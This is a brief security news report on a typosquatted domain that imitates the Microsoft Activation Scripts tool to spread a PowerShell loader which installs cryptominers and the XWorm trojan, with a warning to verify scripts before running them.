A fraudulent domain masquerading as the popular Microsoft Activation Scripts (MAS) tool is being used to infect users with a malicious PowerShell-based loader. The attackers registered the look-alike domain "get.activate[.]win," which is just one character different from the legitimate "get.activated.win" address used in official MAS instructions. By capitalizing on user typos, the campaign tricks people into executing harmful scripts that install the "Cosmali Loader" malware.
Infected users have reported receiving pop-up warnings on their systems, alerting them to the Cosmali Loader infection and advising them to check for suspicious PowerShell processes in Task Manager. Analysis reveals the malware is used to deploy cryptominers and the XWorm remote access trojan. It is believed a security researcher gained access to the malware's insecure control panel to send these warnings and notify victims.
MAS is an open-source tool for activating Windows and Office without a license, which Microsoft considers a piracy utility. Its maintainers have warned users about this campaign, urging them to verify commands before execution. This incident highlights the ongoing risk of malware distribution through typosquatted domains and unofficial activation tools, emphasizing the need for caution when running scripts from untrusted sources.
Read more...